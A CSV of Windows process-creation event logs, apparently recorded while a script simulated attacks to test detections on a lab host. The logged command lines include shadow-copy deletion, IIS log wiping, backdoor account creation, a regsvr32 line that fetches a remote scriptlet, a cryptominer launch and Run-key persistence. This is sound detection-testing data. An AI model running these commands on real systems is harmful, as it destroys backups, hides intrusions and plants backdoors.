47,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.277,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1700,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""systeminfo && systeminfo""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.277
48,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340
49,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.353,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1738,C:\Diagnostics\UserTmp\42424.exe,%%1936,0x1728,42424.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.353
50,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400
51,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.430,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x176c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.430
52,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\1234.exe,%%1936,0x176c,1234.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.447
53,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a0,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.500
54,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.510,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C reg.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.510
55,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17e8,C:\Diagnostics\UserTmp\reg.exe,%%1936,0x17cc,reg.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.520
56,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.563,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x143c,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg.exe  add \hkcu\software\microsoft\some\key\Run /v abadvalue,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.563
57,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.613,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1064,C:\Diagnostics\UserTmp\tsetup.1.exe,%%1936,0xbc8,"c:\Diagnostics\UserTmp\tsetup.1.exe  C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetup.1.0.14.tmp"" /SL5=""$250276,19992586,423424,C:\Users\MSTICAdmin\Downloads\tsetup.1.0.14.exe",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.613
58,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.663,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1434,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,".\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.663
59,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,".\netsh.exe  ""in (*.exe) do start # artificial commandline solely for purposes of triggering test""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.677
60,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.720,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1404,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.720
61,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.767,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x148c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.767
62,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.807,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&powershell winrm set winrm/config/service/Auth @{Kerberos=003D""true""}&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.807
63,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.850,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\ProgramData""&copy \\[REDACTED]\c$\users\[REDACTED]\Documents\""Password Change Dates.docx""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.850
64,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.893,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ec,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&c:\windows\system32\inetsrv\appcmd set config ""Default Web Site/"" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.893
65,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&del C:\inetpub\logs\logFiles\W3SVC1\*.log /q&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.967
66,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.020,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Diagnostics\UserTmp\perfc.dat,%%1936,0xbc8,c:\Diagnostics\UserTmp\perfc.dat ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.020
67,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.077,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1564,C:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.077
68,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.127,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x155c,C:\Diagnostics\UserTmp\doubleextension.pdf.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\doubleextension.pdf.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.127
69,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.137,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1550,C:\Windows\System32\vssadmin.exe,%%1936,0xbc8,vssadmin  delete shadows /all /quiet,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.137
70,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:24.003
71,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:24.023
72,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:25.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x244,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:25.517
73,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa10,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:26.013
74,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc54,C:\Windows\System32\dllhost.exe,%%1936,0x280,C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E},C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.017
75,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbc8,C:\Windows\System32\cmd.exe,%%1936,0x440,cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp,C:\Windows\System32\svchost.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.047
76,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.057,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x10cc,C:\Windows\System32\conhost.exe,%%1936,0xbc8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.057
77,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.247,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1288,C:\Windows\System32\cmd.exe,%%1936,0xbc8,cmd  /c echo Any questions about the commands executed here then please contact one of,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.247
78,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.257,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x3dc,C:\Windows\System32\cmd.exe,%%1936,0xbc8,cmd  /c echo [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected],C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.257
79,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.390,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x2a8,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user adm1nistrator Bob_testing /add,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.390
80,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.410,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xa5c,C:\Windows\System32\net1.exe,%%1936,0x2a8,C:\Windows\system32\net1  user adm1nistrator Bob_testing /add,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.410
81,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.503,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xfc0,C:\Windows\System32\net.exe,%%1936,0xbc8,"net  share TestShare=c:\testshare /Grant:Users,Read",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.503
82,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.517,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x10b8,C:\Windows\System32\net1.exe,%%1936,0xfc0,"C:\Windows\system32\net1  share TestShare=c:\testshare /Grant:Users,Read",C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.517
83,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.543,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x132c,C:\Windows\System32\Dism.exe,%%1936,0x77c,dism /online /enable-feature /featurename:File-Services /NoRestart,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.543
84,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.550,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x4e8,C:\Windows\System32\conhost.exe,%%1936,0x132c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\Dism.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.550
85,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.830,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xcd8,C:\Windows\System32\net.exe,%%1936,0xbc8,net  use q: \\MSTICAlertsWin1\TestShare Bob_testing /User:adm1nistrator,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.830
86,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.850,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x97c,C:\Windows\Temp\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\DismHost.exe,%%1936,0x132c,C:\Windows\TEMP\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04},C:\Windows\System32\Dism.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.850
87,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:04.507,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\servicing\TrustedInstaller.exe,%%1936,0x230,C:\Windows\servicing\TrustedInstaller.exe,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:04.507
88,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:05.193,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe68,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\TiWorker.exe,%%1936,0x280,C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\TiWorker.exe -Embedding,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:05.193
89,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:08.723,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x12fc,C:\Windows\System32\net.exe,%%1936,0xbc8,net  use q: /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:08.723
90,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.667,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xc18,C:\Windows\System32\net.exe,%%1936,0xbc8,net  share TestShare /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.667
91,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.683,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Windows\System32\net1.exe,%%1936,0xc18,C:\Windows\system32\net1  share TestShare /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.683
92,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.707,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1274,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user adm1nistrator /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.707
93,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.730,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x614,C:\Windows\System32\net1.exe,%%1936,0x1274,C:\Windows\system32\net1  user adm1nistrator /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.730
94,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.753,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xd10,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.753
95,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:10.817,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\svchost.exe,%%1936,0x230,C:\Windows\system32\svchost.exe -k wsappx,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.817
96,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.190,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x135c,C:\Windows\System32\win32calc.exe,%%1936,0xd10,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\regsvr32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.190
97,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.260,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x103c,C:\Diagnostics\UserTmp\suchost.exe,%%1936,0xbc8,.\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.260
98,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.347,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1014,C:\Windows\System32\win32calc.exe,%%1936,0x103c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\suchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.347
99,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.413,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.413
100,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x11cc,C:\Windows\System32\win32calc.exe,%%1936,0xbb4,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.493
101,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.537,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.537
